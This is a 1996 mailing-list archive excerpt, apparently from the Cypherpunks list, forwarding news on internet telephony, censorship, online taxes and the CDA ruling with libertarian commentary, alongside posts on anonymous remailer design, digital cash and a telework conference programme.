> NEW YORK (Sep 17, 1996 7:53 p.m. EDT) - Lucent Technologies Inc.,
> vowing to make voice and video communication over the Internet as
> easy-to-use and accessible as the telephone, unveiled Tuesday a new
> business venture and several products designed to bring Internet
> communication into the mainstream.

[...]

> The venture is charged with commercializing several ground-breaking
> Internet software compression technologies developed at Lucent's Bell
> Laboratories research unit. Such technology shrinks the capacity
> required to transmit information over communications networks.
> Internet-based communications typically requires access to a personal
> computer, but Lucent envisions using the telephone or other consumer
> electronics device for the same purpose.
> Murray Hill, N.J.-based Lucent said its new Elemedia Internet business
> is now offering software that allows callers to hold
> "telephone-quality" conversations over the Internet.

Has anyone taken a look at this software with a view to an encryption patch?

> Lucent said its strategy was to capitalize on software component
> technology developed by Bell Labs by licensing it to other Internet
> phone makers and established telephone carriers for use in their own
> products. Lucent does not intend to sell its products directly to the
> public.

As I recall, Jeff Weinstein mentioned that he was looking into encryption for the Netscape Internet Phone. I would be curious if Netscape is considering integrating the Lucent software.

> It said its products would be compatible with all major computer
> operating systems and Internet browsers software.

[...]

> Lucent will introduce a means for callers using standard telephones to
> place calls via the Internet to callers at conventional phones or to
> newer PC-based phones.
> "We believe voice communications between Internet PCs is much more
> valuable if those voice conversations can happen with people who have
> telephones," Pavarini said.
> Lucent officials said these new business-oriented products will become
> commercially available beginning in the first quarter of 1997 in the
> United States and be rolled out to selected overseas markets through
> the second quarter of 1997.

[...]

> Copyright © 1996 Nando.net

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:30:23 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 1 Oct 1996 08:30:23 +0800
Subject: Malaysia ranting about the Internet
Message-ID: <01IA3HHL8XEO8Y57AQ@mbcl.rutgers.edu>

Rack up another country likely to start censoring the Net (or trying to, at least). What degree of Internet connectivity does Malaysia have, anyway?

> _________________________________________________________________
> Centura
> _________________________________________________________________
> MALAYSIA SAYS WEST SPREADING SMUT AND VIOLENCE
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
> UNITED NATIONS (Sep 28, 1996 02:12 a.m. EDT) - Malaysia's prime
> minister accused the West Friday of spreading smut and violence,
> particularly on the Internet.

And what, pray tell, is wrong with this?

> In his speech to the U.N. General Assembly, Mahathir bin Mohamad said
> that although the information age facilitated worldwide knowledge, it
> also demeaned moral values.
> "Smut and violence gratuitously distributed by criminals in the North
> is no less polluting than carbon dioxide emissions nor less dangerous
> than drug trafficking."

All three of them things that probably shouldn't be limited, noticeably, and things that are classically used to discourage human freedom & progress.

> In a reference to the United States he said if one great power could
> apply its laws to citizens of another country for drug trafficking
> "why cannot countries with different moral codes extradite the
> traffickers of pornography for legal action?"
> "Before the whole world sinks deeper into moral decay, the
> international community should act. Abuse of the ubiquitous Internet
> system must be stopped," he said.
> Politically, he said the monopoly of the West's electronic media
> should be broken on so-called world news networks.
> "Not only are distorted pictures of our countries being broadcast but
> our own capacity to understand what is happening is being undermined,"
> he said.

Translation: people are finding out true information that local governments don't like - such as what goes wrong.

> "In the past, Western missionaries spread the gospel. Today the media
> has taken over and all our cherished values and diverse cultures are
> being destroyed," he said.

Translation: our culture that promotes censorship and other civil liberties violations is being destroyed.

[...]

> The prime minister also lashed out at U.N. forums where nations
> lamented poverty, debt, human rights abuse, conflicts and war without
> doing much about them.
> "It is boring almost. And yet nothing much has been done which could
> bring about amelioration of this sad state of affairs," he said.

Translation: Give us money.

> Copyright © 1996 Nando.net

From mech at eff.org Mon Sep 30 17:32:34 1996
From: mech at eff.org (Stanton McCandlish)
Date: Tue, 1 Oct 1996 08:32:34 +0800
Subject: Another briefing in Atlanta on the NRC crypto report,... (fwd)
Message-ID: <199609302131.OAA02867@eff.org>

CRYPTO typed:

>From crypto at nas.edu Mon Sep 30 07:32:49 1996
Date: Mon, 30 Sep 96 10:26:00 EST
From: "CRYPTO"
Encoding: 27 Text
Message-Id: <9608308441.AA844104704 at nas.edu>
To: crypto at nas.edu
Subject: Another briefing in Atlanta on the NRC crypto report,...

Subject: Another briefing in Atlanta on the NRC crypto report, October 21, 1996

Cryptography's Role in Securing the Information Society
A Public Briefing in Atlanta, Georgia
Monday, October 21, 1996, 1:30-3:30 pm

There will be a public briefing in Atlanta, Georgia by the National Research Council on this report.
The briefing will be held at the Manufacturing Research Center on the campus of the Georgia Institute of Technology on Monday October 21, from 1:30 to 3:30. Dr. Herbert Lin, director of the NRC study will conduct the briefing. Questions from the audience will be entertained.

For further information, please contact Dr. Myron L. Cramer (404) 894-7292, at the Georgia Tech Research Institute. The event is open to the press and the public.

Directions: From I-75/85 exit on Tenth Street and head West. Turn left on Hemphill Street and follow it to where it ends on Ferst Street. The Manufacturing Research Center is the modern building in front of you. Parking is limited; use public transportation or allow yourself extra time.

If you have suggestions about other places that the committee should offer a public briefing, please send e-mail to crypto at nas.edu.

--
Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Program Director

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:39:13 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 1 Oct 1996 08:39:13 +0800
Subject: Inflation-index bonds and private e-currency
Message-ID: <01IA3GAFNCWK8Y57AQ@mbcl.rutgers.edu>

One of the attractions of privately-produced currencies is as a hedge against inflation; this development may be a competitor to this idea. On the other hand, this setup does have an unavailability in _time_ of the money (more so than other, equal-security bonds of the same duration), which may offset its greater spendability.
-Allen

> BARRON'S Online - Market Surveillance for the Financial Elite
> _________________________________________________________________
> Barron's
> _________________________________________________________________
> CLINTON UNVEILING NEW GOVERNMENT BOND WITH INFLATION PROTECTION
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 The Associated Press
> WASHINGTON (Sep 25, 1996 11:12 a.m. EDT) -- President Clinton, in his
> latest election-year appeal to the middle class, is unveiling details
> of a new type of government bond that will offer investors protection
> against inflation.

[...]

> As the program was explained, the securities will protect the
> principal against inflation, as measured by the consumer price index.
> As an example, the official said, if inflation increases 3 percent in
> a given year, a $1,000 bond would be adjusted upward to $1,030 at the
> end of that year.
> By offering this protection, interest rates on the bonds will be lower
> than on regular 10-year notes that do not provide inflation
> protection.

[...]

> The notion of tying government securities to inflation has not been
> tried in the United States, but other countries have been offering
> such investments for some time.
> Such bonds have been available in Britain since 1981 and are also
> offered in Canada, New Zealand, Australia, Israel and Sweden.
> Copyright © 1996 Nando.net

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:39:38 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 1 Oct 1996 08:39:38 +0800
Subject: [NEWS] More internet-tax proposals
Message-ID: <01IA3GIEKEYW8Y57AQ@mbcl.rutgers.edu>

> _________________________________________________________________
> Centura
> _________________________________________________________________
> INTERNET BEWARE: GOVERNMENTS ARE SMELLING A RICH NEW SOURCE OF TAXES
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 The Boston Globe
> (Sep 25, 1996 8:06 p.m. EDT) If taxes are the price we pay for
> civilization, the Internet is about to become a lot more civilized.
> State and local governments are coming to see on-line computer
> networks as a rich, new revenue source, and they want to cash in.
> An official of the Massachusetts Department of Revenue said this month
> on-line service providers that do business in the state should be
> paying a 5 percent sales tax. Those who haven't been paying could face
> audits, penalties and demands for back taxes.
> The state of Tennessee has demanded on-line services doing business
> there turn over their tax records and a count of how many customers
> they have in the state. Cities in Texas and Colorado are considering
> special on-line taxes. And a recent effort to slap a 6 percent tax on
> Internet users in Tacoma, Wash., aroused so much public outrage that
> city officials were forced to back off.
> Many Internet experts agree that Internet taxes are inevitable. After
> all, connecting computers to the Internet is now a $2 billion
> business, and people use these networks to buy and sell millions of
> dollars in goods and services.

[...]

> But some also fear the chaos that could result as 50 state governments
> and thousands of cities and counties each make their own rules about
> taxing computer networks and the transactions that occur on them.
> The issue may be given new prominence, thanks to a surprising decision
> by a major Internet service provider. In late August, Netcom On-Line
> Communication Services Inc. began notifying its Massachusetts
> customers the company would start adding the state's 5 percent sales
> tax to its bills. Netcom typically charges $19.95 a month for a
> personal Internet account, so the tax would amount to $1. Similar
> notices were sent to Netcom customers in several other states,
> including Illinois and Pennsylvania.
> Did the taxing authorities in these states demand their money? Guess
> again. Netcom has decided to begin paying the taxes voluntarily.
> Thomas Weatherford, Netcom's chief financial officer, said its
> accounting firm, Ernst & Young, warned them early this year that
> Netcom might be liable for the taxes.

[...]

> So Netcom contacted state tax officials for clarification. Netcom's
> 500,000 customers are scattered throughout the United States, but the
> company is focusing on tax laws in Massachusetts and 14 other states
> where most of its customers dwell. Weatherford said he still had
> received no official word from Massachusetts, but Netcom attorneys had
> concluded the company is subject to the state's telecommunication
> sales tax. To play it safe, it will begin collecting the tax this
> month.

Remind me not to sign up with Netcom.

> It's probably a smart move. At the Massachusetts Department of
> Revenue, acting general counsel William Hazel told the Globe that
> Netcom and every other on-line service provider should be paying the
> sales tax.
> "To the extent that folks are being charged for the ability to
> telecommunicate through the Internet... that's taxable," he said.
> This situation could change. The state has set up a legislative
> commission to review its telecommunications tax policy, with a final
> report due next year. But for now, Hazel said, Massachusetts wants its
> money, including back taxes from up to seven years ago. Hazel said
> some Internet access providers are paying the tax already.
> But plenty of others are not. For example, Kristopher Hill, president
> of NetWorx Internet Services Inc. in Newburyport, said he believed his
> firm didn't have to pay sales tax in any of the dozen states in which
> it operates. He wasn't thrilled to hear that he may be wrong. "If we
> have to start dealing with Chicago tax law, that'll be a major pain in
> my butt," he said. Chicago imposes a tax on telecommunications
> services over and above the Illinois state tax.
> Hill is even more annoyed by the prospect of being ordered to pay
> years of back sales taxes in Massachusetts. He said state officials
> never told Internet service providers they were liable for the money,
> and to try to collect it now would be unfair. "We would sooner leave
> the commonwealth than be subjected to seemingly arbitrary and
> ill-defined taxes," Hill said.

[...]

> Netcom's Weatherford opposes taxes on Internet services but says if
> his company pays voluntarily, tax officials should demand payment from
> Netcom's competitors. That could mean trouble for America's 3,700
> Internet service providers, many of which are shoestring operations
> that will have to set up tax collection procedures.

Translation: Netcom is attempting to use regulations to shut down its competitors.

> The fuss over Internet service taxes is just the beginning. Another
> sticky controversy awaits: How do you tax sales of goods and services
> over the Internet?

[...]

> And then there's the question of which government is entitled to
> collect the tax. Say you log on to Ohio-based CompuServe, where you
> buy a fruit basket from a firm in California and have it sent to your
> mother in Chicago. Which state gets to collect tax on the transaction?
> The experts say right now, the answer is unclear.

If they think that's "unclear", wait until they start dealing with multinational transactions....

> But tax-hungry governments are hard at work trying to figure it all
> out. According to KPMG Peat Marwick, sales of goods and services over
> the Internet will reach $125 billion by the year 2000. One way or
> another, governments intend to get their share.

Note the typical biased phrasing.

[...]

> Copyright © 1996 Nando.net

From snow at smoke.suba.com Mon Sep 30 17:49:49 1996
From: snow at smoke.suba.com (snow)
Date: Tue, 1 Oct 1996 08:49:49 +0800
Subject: Making Remailers Widespread [REMAILERS]
In-Reply-To: <199609290623.XAA25604@dfw-ix3.ix.netcom.com>
Message-ID: <199609301757.MAA00328@smoke.suba.com>

Mr. Stewart said:
> I agree, it's a problem; the return address seems to reduce abuse.
> But one-way remailers can be used to simulate many of the uses of two-way,
> especially with message-pool return methods (e.g. alt.anonymous.messages.)
> Doing two-way remailers well is hard - most of the methods around are ok
> for passive attacks, but may not resist subpoenas, rubber-hose, or crackers.
> It's especially hard if you want the remailer to be a no-brainer to install
> and operate, rather than one that requires expert support.
> Snow's one-shot reply block method is interesting, whether you do a public-key
> or secret-key approach (if you do public key, you obviously use the public
> half for the part that stays at the remailer.) It has the real advantage that
> compromising the remailer doesn't give you the reply information for past or
> current messages, so you can only compromise one message at a time,
> which is a big win over the one-key-per-remailer reply blocks.
> I think I like it.
> On the other hand, there are a host of potential problems:
> - Chaining is probably more difficult, at least return-chaining.

Each reply refers to the remailer before it.
The originating web site hands the originator a key and a pseudo-random ID. The originator can check back on a regular basis to see if a reply came back in. That way there is no "final trail" and the recipient can view the page thru something like www.anonymizer.com.

> - Individual True Believer remailer operators would usually resist
> cooperating with authorities to decrypt the reply block, but ad-hoc
> remailer operators who are just running a remailer because they haven't
> turned off the default feature that came with their Web Server
> will probably reveal the key, especially for Politically Incorrect material
> (definition depends on their individual politics, of course.)

Set a time limit on replies (say 5 days) and after the 5 days, the reply is deleted by the server. That way the casual user would have to hack the code to _keep_ the addresses on hand, and the censors would have to get back thru the entire chain in 5 days, and they don't know the entire chain to begin with. If you can get the web server spread out internationally, that ain't gonna happen.

> - A web form interface, filled out from a web anonymizer, doesn't
> give you a useful return address, so spammers can still abuse it.

If you insert the *this is an anonymous email* automatically, this won't matter as much. Commercial spammers will have to put a commercial access point (phone, fax, email address) in their message and people who are just harassing others will get deleted pretty quick.

Spam itself will be cut back as you only allow number of addresses per message, and set it up so that you enter the addresses on a separate page from the message. That way to hit 2 or 3 hundred email addresses you have to enter the message 100 times. Ok, so cut and paste 100 times, but if the spammer has a brain (I know, but there may be one or two) they are going to get the spam out.
How about this (It is a little complicated, so it may not work)

Alice wants to send email to Bob, so she hits Sameer's anonymizer site to go to a random remailer web site. At this site she enters Bob's email address on one page, and on the next enters her message. This message could even be encrypted, assuming that Bob knows what to do with it. Hit send.

The webremailer software hands Alice a temporary (10 day expire time) ID and key/passphrase. The webremailer selects the next mailer in the chain, encrypts the message, writes the public key and encrypted message to disk (with date stamp), and forwards the email (encrypted message + key) to the next remailer.

The second (and each succeeding remailer in the chain) simply re-writes the headers and writes a keyid/previous-remailer pair file (with date stamp) to file. (maybe even keep a single database file with this info in it, a single file might not get written to disk as often (maybe) and with constant would be marginally harder to "recover" old addresses from than multiple hard files (or would it?) and then sends the mail on. If we can use the "puts" feature, we really don't need much in the way of headers right?

Anyway the last remailer in the chain writes a simple web page with the keyid of the keypair, and simply sends the key and an address to the recipient so that 1) the final "message" is still not the email, only a notice that email is waiting, for instance http://www.encodex.com/anonmail/id0x4556/

The recipient then goes to the site (or doesn't if they don't want email) they can use www.anonymizer.com if they wish, and they enter their key when prompted. The encrypted file is then decrypted and sent to them.

At this point, the encryption is more to prevent the "prying eyes" than TLA level snooping, so it has to be good, but it doesn't have to be 2000 bit RSA type stuff. That can be done at the message level.

Return messages would include the keyid of the sent message, and would retrace the same hops.
At the original end, a simple web page is written and a "you have a reply to your anonymous message at http://www.encodex.com/anonmail/id0x99a4/

Holes?

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From declan at well.com Mon Sep 30 18:16:55 1996
From: declan at well.com (Declan McCullagh)
Date: Tue, 1 Oct 1996 09:16:55 +0800
Subject: FRC's Cathy Cleaver bashes CDA ruling, online "anarchy"
Message-ID:

---------- Forwarded message ----------
Date: Mon, 30 Sep 1996 07:49:55 -0700 (PDT)
From: Declan McCullagh
To: fight-censorship at vorlon.mit.edu
Subject: FRC's Cathy Cleaver bashes CDA ruling, online "anarchy"

This is a wonderful article by the Family Research Council's Cathy Cleaver. Her strategy: Rant about porn, rant about children. But ignore that the Internet is not radio or television so different standards should apply. And ignore that another three-judge panel in NYC came to similar conclusions as the Philly ones did.

Obviously, the largely Bush- and Reagan-appointed Federal judiciary has been brainwashed by computer geeks. Or perhaps the judges, unlike Ms. Cleaver, actually logged on once or twice.

-Declan

************

http://www.frc.org/townhall/FRC/perspective/pv96i3pn.html

CYBERCHAOS: NOT FIRST AMENDMENT'S PROMISE
by Cathleen A. Cleaver, Esq.

The Department of Justice has announced that it will appeal to the Supreme Court the recent Philadelphia federal court's ruling against the Communications Decency Act. That appeal is the right thing to do, and here's why.

Not long ago I debated Bob Guccioni, publisher of Penthouse, on the merits of restricting computer pornography and the Philadelphia ruling. Not surprisingly, he was elated by the three-judge panel's decision to strike the indecency provisions, the effect of which was to give a computer pornographer more "free speech" rights than any other speaker in any other forum.
For the first time in the history of our country, a porn purveyor may intentionally show sexually explicit pictures to a child without legal jeopardy -- provided the purveyor uses the Internet.

First in line to challenge the CDA was, of course, the ACLU and its cyberclones, followed by CompuServe, America Online, and others with a huge financial stake in the unenforceability of the CDA, like Playboy and Penthouse. Guccioni may finally claim the consumer market share which he has heretofore been denied.

Not only did the Philadelphia panel strike provisions prohibiting adults from posting sexually explicit materials in public areas of the Internet that children frequent -- like teen chat rooms -- but it also struck the prohibition on e-mailing a Penthouse centerfold (or the like) directly to a specific child who is known by the sender to be a child. In the words of the Department of Justice: "Never before in the history of telecommunications media in the United States has so much indecent (and obscene) material been so easily accessible by so many minors in so many American homes with so few restrictions."

To say the ruling is flawed is a double understatement. Not only is the decision based on legal theories directly contrary to Supreme Court precedent and incorrect assumptions about the capabilities of Internet technology, but it is less a ruling than a trio of separate opinions. Each judge took his turn chiding Congress for daring to inhibit the liberty of cyberspace pioneers, however ruthless, in the interest of children and the greater cybercommunity.

Highlights from the lengthy trilogy include conclusions that it is "either technologically impossible or economically prohibitive" to comply with the CDA, that the term 'indecent' is altogether too vague, and that, "just as the strength of the Internet is chaos, so the strength of our liberty depends upon the chaos and cacophony of unfettered speech." These conclusions defy fact, law, and logic, respectively.
Given that some on-line pornographers currently screen and restrict children from their sites, it cannot be said that compliance is impossible. Moreover, new technology is being developed at dizzying speed to address a variety of Internet challenges, such as consumer transaction security and the protection of property rights of amateur musicians who exchange their songs, making it all the more evident that it is really lack of will and not ability which makes Internet advocates cry "foul." As to expense, this callous court complains about the economic burden the CDA would impose on distributors of pornography, while finding it good and proper for parents alone to incur the costs, however great, of protecting their children. Outside the sacred realm of cyberspace, distributors of pornography routinely incur expenses to shield children. To cite just one example, "blinder racks" must be purchased and installed at newsstands so that children do not see offensive sex magazine covers. This economic burden flows directly from the legal responsibility these distributors bear to shield this material from minors. Software blocking programs, on the other hand, are initially expensive for parents, need frequent updating (at considerable expense), are easily circumvented by computer-savvy kids, and are simply incapable of screening much of the pornography. Surfwatch, the leading software blocker, admitted in the CDA hearing to missing up to 800 sexually explicit sites each month! Moreover, it goes without saying that a software blocking program can only work on a family's home computer where it is installed. What happens when the kids go next door or, for that matter, to the public library? The American Library Association proclaimed in the Philadelphia court that, as a matter of solemn principle, it will never employ software screening programs in its libraries' computers -- not even when children use them. 
This to-hell-with-children sentiment is reflected by the judges and echoes throughout their opinions. Chief Judge Sloviter's opinion even concludes that for "content providers . . . to review all of their material" to determine which of it is sexually explicit is surely "a burden one should not have to bear." What? The content provider is in the best position to determine whether his material contains patently offensive depictions of sexual or excretory activities, and that is why our laws have always required him to do just that. The allocation of this burden to the speaker, as opposed to the consumer of the speech, not only carries the weight of unanimous legal precedent, but also has the benefit of being practical. It is virtually a truism to say that, as between speaker and consumer, the speaker is in the better position to know the content of his speech. Judge Sloviter would remove a reasonable burden from content providers and replace it with the enormous and nearly impossible burden on parents to first locate, then evaluate, and then block pornographic material in an effort to protect their children. Their quarrel with the indecency standard reveals that the judges are either ill-informed or ill-intentioned. An indecent communication is one "that, in context, depicts or describes, in terms patently offensive as measured by contemporary community standards, sexual or excretory activities or organs." This definition has been consistently upheld in every case in which it has been reviewed, including at the Supreme Court, which, most recently in the cable pornography case of Denver Area Educational Telecommunications Consortium, Inc. v. FCC, held the standard to be "not impermissibly vague." As if to justify their awkward conclusion, the court lists as examples of "threatened" speech material which simply could not fall within the definition of indecency, such as discussions of recent movies or ancient Indian statues or articles about human rights violations. 
To serve their end, the judges conveniently, but not subtly, ignore the requirement that the materials be evaluated "in context." No court has ever construed this standard to encompass, without any consideration of context, all material of literary or artistic value that is somehow related to sexuality. Not to be topped, Judge Dalzell proclaims: "Any content-based regulation of the Internet, no matter how benign the purpose, could burn the global village to roast the pig." Really? What about fraud -- may we not protect consumers in cyberspace? May we not ban child pornography or enforce copyright violations on-line? Would these content-based regulations burn the village, too? If the First Amendment's promise to this new technology is indeed chaos and anarchy, then perhaps Judge Dalzell is right. But before we too quickly agree with this visionary from the federal bench, we ought to ask ourselves how we have survived and thrived as a democracy for two centuries upon the bedrock of ordered liberty, the enemy of chaos and anarchy. The Supreme Court ought to roundly denounce this federal panel's decision. To affirm it would be to rob our children of the opportunity to participate in this great new communications medium, or worse, to sacrifice them to perversions and excesses for the convenience and pleasure of the worst malefactors on-line -- in effect, to preserve the pornographers' new found sanctuary known as cyberspace. -- 9/9/96 Cathleen A. Cleaver, Esq. is Director of Legal Studies at the Family Research Council, a Washington, D.C.-based research and educational organization. Miss Cleaver has extensive experience in pornography litigation and legislation. ### From rah at shipwright.com Mon Sep 30 18:28:17 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 09:28:17 +0800 Subject: e$: NSA Fluffy FUD? 
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

I just got off the phone with a reporter who was interviewing me for a comment in the paper on Cybercash's "CyberCoin" mini-money protocol. My comment was that I hadn't paid much attention to it, because I figured it was yet another book-entry system, but, since he e-mailed me ahead of time, I went to look at their FAQ on the web, and, yup, sure enough, it was yet another book-entry system. :-).

For the record, I have no problems with Cybercash, themselves. If anyone's going to do a book-entry system, it might as well be Cybercash.

What? What about CyberCoin? Oh. Yeah. CyberCoin. Well, the best way I can figure, it's a transaction accumulator for either your credit card or debit card, like First Virtual does for small transactions, only it settles way much quicker, like less than 90 days. :-).

On the privacy standpoint, it hides transactions from the merchant, which is cool, but not from the bank, which is not cool. What do you expect from a book-entry system? ;-). Cybercash at least makes no claims for anonymity, unlike other transaction systems who will remain nameless...

Cybercash is at if you want more details.

Almost as an afterthought, the reporter said that someone at the NSA had cranked out a for-public report, which he had just gotten a fax of, decrying the susceptibility of digital bearer certificate issuers in general, digital cash issuers in particular, to rubber-hose attacks on their private keys. The "Print off a trillion dollars in digimarks, buddy, or we'll kill 'Fluffy', your cat, here..." scenario. Maybe we can call it a Fluffy-the-cat attack...

The first time I heard of this old chestnut, of course, was from the lips of Nathaniel Borenstein, who was pushing First Virtual rather strenuously at the time, as a solution to that problem, among others, up to, but not including, dandruff and world peace.
This was before he invented the keyboard sniffer, so I was actually listening to him, in those days. :-).

Now it seems the NSA has picked up Nathaniel's fumbled ball and is running with it for all they're worth.

Of course, the best way to deal with this from a technical standpoint is not technically, of course, but with a market model: one with lots of issuers, trustees, protocol designers, software developers, buyers and sellers, in one great big robust, happy, many-to-many competitive clusterfuck of digital commerce. Not to mention, of course, expiry dates on the digital bearer certificates themselves.

Anyway, has anyone *else* seen this apocryphal NSA paper yet? Is it on the web? I'm sure (he said, volunteering someone else's services unasked yet again) that someone like John Young would be interested in seeing that fax...

So, the reporter asks, do I think that Citicorp should get into the business of issuing digital cash? Well, I guess not. Not according to the NSA, anyway, especially if John Reed has a cat named 'Fluffy'.

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b3

iQCVAwUBMlBBLfgyLN8bw6ZVAQENFQP9HKP1TdH27b7e2oruWFK1uc/aALOWPPUy
jU+zCS+xUgYwdTlFiI2+6xD/jiylU9Twf6rgX63NQ3JNl1rQhmVW8wIhArgbakkg
3/zxWeMJ+Bc/1N0t+XsHdB3MQ07HygaPyjKED73Exy2uO60XuY8Je2isM4fr2B4d
85OeDCb606Q=
=61Gj
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 18:50:52 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E.
Allen Smith) Date: Tue, 1 Oct 1996 09:50:52 +0800 Subject: 3rd European Assembly on Telework and New Ways of Working Message-ID: <01IA3EDBZEQA8Y57AQ@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 25-SEP-1996 00:10:23.83 From: Phil Agre X-URL: http://communication.ucsd.edu/pagre/rre.html X-Mailing-List: archive/latest/1317 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 24 Sep 1996 08:31:26 +0200 From: brennert at sun1.alpin.or.at (Barbara Rennert-Buchegger) [...] Preliminary Programme Telework '96 3rd European Assembly on Telework and New Ways of Working WORKING IN A WIDER EUROPE November 4 - 6, 1996, City Hall, Vienna, Austria organized by European Community Telework Forum (ECTF) in association with European Commission City of Vienna Federal Ministry of Science, Transports and the Arts Chamber of Labour of Vienna European Trade Unions Confederation Austrian Trade Unions Confederation --------------------------------------------------------------- Patronage Thomas KLESTIL - President of the Federal Republic of Austria Honorary Presidency Martin Bangemann - European Commission, Commissioner of DG XIII (Belgium) Rudolf SCHOLTEN - Federal Minister of Science, Transport and the Arts (Austria) Michael HAeUPL - Mayor of the City of Vienna (Austria) Hannes SWOBODA - Councillor for Urban Planning and Foreign Affairs (Austria) Assembly Co-ordinator Josef HOCHGERNER - Centre for Social Innovation, ECTF (Austria) Programme Chair Enrique de la SERNA - INNOVA Intl., ECTF (Italy) Christine GAUTHIER - CATRAL 
(France) Franz NAHRADA - Globally Integrated Village Environment, CSI (Austria) Assembly Steering Committee Katarina ALMQUIST - NUTEK/Assembly Co-ordinator 1997 (Sweden) Eduardo BARRERA CORTEZ - INMARK, ECTF (Spain) Karl BONOMEO - TeleVillage Bruck an der Leitung (Austria) Bruno BUCHBERGER - Softwarepark Hagenberg (Austria) Renate CZESKLEBA - Austrian Trade Union Confederation (Austria) Philippe DORIN - CATRAL (France) Charles GRANTHAM - ISDW & CSI (USA) Noel HODSON - SW 2000, ECTF (United Kingdom) Arnold KLOTZ - Planning Director of the City of Vienna (Austria) Brigitta MLINEK - Chamber of Labour of Vienna (Austria) Jack NILLES - JALA, ECTF (USA) Walter PAAVONEN - ECTF (Sweden) Andrew PAGE - ECTF (United Kingdom) Ingolf SCHAeDLER - Federal Ministry of Science, Transport and the Arts (Austria) Alain VEYRET - IDATE, ECTF (France) European Commission Peter JOHNSTON - DG XIII Maarten BOTTERMAN - DG XIII European Trade Unions Confederation (ETUC) Emilio GABAGLIO --------------------------------------------------------------- Organization European Community Telework Forum ECTF Austria Secretariat Center for Social Innovation CSI Hettenkofergasse 13 A-1160 Wien Tel. +43-1-495 04 42-41 Fax +43-1-495 04 42-40 eMail j.hochgerner at magnet.at ECTF International Secretariat Santa Cruz de Mercenado, 33 E-28015 Madrid Tel. +34-1-541 72 64 Fax +34-1-559 92 74 eMail eb.ectf at mad.servicom.es Conference Secretariat bco - j. breit congress organisation GmbH Lenaugasse 11/36 A-1080 Wien Tel. +43-1-403 28 20 Fax +43-1-406 77 52 eMail bco.breit at magnet.at ATTENTION: As of Monday, November 4, 1996, the conference secretariat will be located at the congress venue (City Hall). Hotel reservation and travel arrangements Austropa - Interconvention P.O.Box 30 A-1043 Wien Tel. 
+43-1-589 25-114 Fax +43-1-586 71 27 eMail austropa at oevb.co.at

Telework '96 on the Web http://www.bco.co.at/bco/tw96/
The ECTF-HomePage on the Web http://www.agora.stm.it/ectf/ectfhome.html

---------------------------------------------------------------

Preface

Rudolf Scholten
Federal Minister of Science, Transport and the Arts

The diffusion of telework is among the central phenomena characterizing the contemporary technical and economic developments at a global state. Faced with the restructuring of labour-markets and work, and witnessing the rapidity of innovation within the information society it is the task of the responsible analyst to consider the social impact of telework detached from either technological euphoria or resigned cultural pessimism. In parallel to the growth of a worldwide net and the trends toward the liberalisation of the telecom-markets the promotion of telework provides us with seductive visions: Among others there is the promise to harmonize classical antagonisms like those between urban and the rural areas or between work and leisure-time. Accordingly teleworkers may expect a sheltered life in the idyl of the village environment or the fond of the family whilst being mobile beyond national borders at the same time. There is the assumption that women in particular will no longer be threatened by breaks of their professional careers. Companies are expected to increase profits due to increased productivity and organisational innovation. Positive effects on the labour-market and the natural environment are likewise foreseen. No doubt telework bears chances for the future. Nevertheless, we should not forget to take possible disadvantages into account: For example, the mingling of work and private sphere, relevant for mere homebased work, can be a factor of increased individual mental stress. The creation of new patterns of work might be connected with the loss of old types of jobs.
Tendencies toward individualisation and the decline of social solidarity might be intensified. Issues like labour legislation and the threatening decrease of social security urgently need to be discussed. If we were to describe the situation as an open game of chances and risks, a demand for creative policies to shape our future prospects positively and consciously gains evidence. This demand shall be met by "Telework 96": The exchange of experiences between science and policy-makers, industry and trade unions is organized not only in order to analyse the present situation, but also with a view of preparing solutions for the near future. "Working in a Wider Europe" may be read in a twofold way: as referring to an extension of individual life perspectives as well as a metaphor for the promotion of the process of the European integration, whereby the countries of Central and Eastern Europe (CEE) will be of particular interest. The use of advanced technology and traditional ways of decision-making can not be mentioned without referring to mechanisms of exclusion. In contrast, within and around "Telework 96" a wide range of events are organized for addressing various types of institutions and groups of special interest, including pupils, female workers, and persons in search of employment.
Rudolf Scholten

---------------------------------------------------------------

About the Assembly

Focus: European integration, particularly Central and Eastern Europe; transnational standards for telework
Main topics: Getting people to work; Training for life in the Information Society; Working towards sustainability
Format: Scientific conference & political assembly & exhibition of applications and cases
Participants: Leading international experts, practitioners, scientists, politicians, representatives from business, trade unions and public administration and NGO's

